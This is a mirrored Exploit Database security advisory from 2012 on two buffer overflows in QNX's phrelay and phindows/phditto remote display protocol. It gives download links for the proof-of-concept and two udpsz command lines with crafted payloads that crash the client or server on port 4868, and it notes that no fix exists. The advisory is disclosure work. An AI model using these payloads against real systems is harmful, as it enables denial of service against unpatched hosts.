QNX phrelay/phindows/phditto – Multiple Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： Luigi Auriemma
  日期： 2012-05-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18864/

• #######################################################################
  
   Luigi Auriemma
  
  Application:QNX phrelay/phindows/phditto
  http://www.qnx.com
  http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
  http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
  Versions: current
  Platforms:QNX Neutrino RTOS and Windows
  Bugs: A] bpe_decompress stack overflow
  B] Photon Session buffer overflow
  Exploitation: remote
  A] versus client and maybe server
  B] versus server
  Date: 10 May 2012
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  phrelay and phindows/phditto are based on a private protocol that
  allows to use the Photon graphical environment of the server (through
  the phrelay inetd program) on another machine (phindows, phditto and
  any other client).
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  --------------------------------
  A] bpe_decompress stack overflow
  --------------------------------
  
  The BPE (byte pair encoding) compression uses two stack buffers of 256
  bytes called "left" and "right".
  The bpe_decompress function used in all the client/server programs of
  this protocol is affected by a stack based buffer-overflow caused by
  the lack of checks on the data sequentially stored in these two
  buffers.
  
  
  ---------------------------------
  B] Photon Session buffer overflow
  ---------------------------------
  
  Buffer-overflow affecting phrelay in the handling of the device file
  specified by the client as existing Photon session.
  
  
  Note: considering that phrelay is not enabled by default and allows to
  connect without authentication directly to /dev/photon (the screen
  visible phisically on the machine) and phindows/phditto must be
  manually pointed to the malicious host for exploiting bug A, this
  advisory must be considered only a case study and nothing more.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
  
  
  A]
  at the moment I don't know how to call bpe_decompress on phrelay but I
  have verified that the bpe_decompress function is vulnerable at 100%.
  the following test works only on phindows/phditto (the proof-of-concept
  acts as a server):
  
  udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff
  
  B]
  udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################